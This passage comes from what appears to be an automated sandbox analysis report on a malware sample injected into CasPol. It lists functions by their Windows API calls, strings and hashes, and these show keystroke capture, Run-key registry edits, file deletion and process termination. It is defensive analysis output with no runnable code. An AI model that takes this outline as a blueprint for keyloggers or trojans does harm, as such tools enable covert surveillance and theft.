                            • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                            Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyState.USER32(00000011), ref: 0040B64B
                              • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,00000000), ref: 0040A416
                              • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                              • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                              • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                              • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?,?,00000000), ref: 0040A43E
                              • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 0040A461
                              • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                              • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                            • String ID: [AltL]$[AltR]
                            • API String ID: 2738857842-2658077756
                            • Opcode ID: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                            • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                            • Opcode Fuzzy Hash: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                            • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                            Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                            Download Yara Rule
                            APIs
                            • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                            • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: uD
                            • API String ID: 0-2547262877
                            • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                            • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                            • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                            • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                            Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell
                            • String ID: !D@$open
                            • API String ID: 587946157-1586967515
                            • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                            • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                            • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                            • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                            Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyState.USER32(00000012), ref: 0040B6A5
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: State
                            • String ID: [CtrlL]$[CtrlR]
                            • API String ID: 1649606143-2446555240
                            • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                            • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                            • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                            • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                            Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                            • __Init_thread_footer.LIBCMT ref: 00410F29
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Init_thread_footer__onexit
                            • String ID: ,kG$0kG
                            • API String ID: 1881088180-2015055088
                            • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                            • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                            • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                            • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                            Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                            • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteOpenValue
                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                            • API String ID: 2654517830-1051519024
                            • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                            • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                            • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                            • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                            Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteDirectoryFileRemove
                            • String ID: pth_unenc
                            • API String ID: 3325800564-4028850238
                            • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                            • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                            • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                            • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                            Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                            • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ObjectProcessSingleTerminateWait
                            • String ID: pth_unenc
                            • API String ID: 1872346434-4028850238
                            • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                            • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                            • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                            • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                            Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                            • GetLastError.KERNEL32 ref: 00440D35
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1717984340-0
                            • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                            • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                            • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                            • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                            Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                            Download Yara Rule
                            APIs
                            • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                            • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                            • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                            • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastRead
                            • String ID:
                            • API String ID: 4100373531-0
                            • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                            • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                            • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                            • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99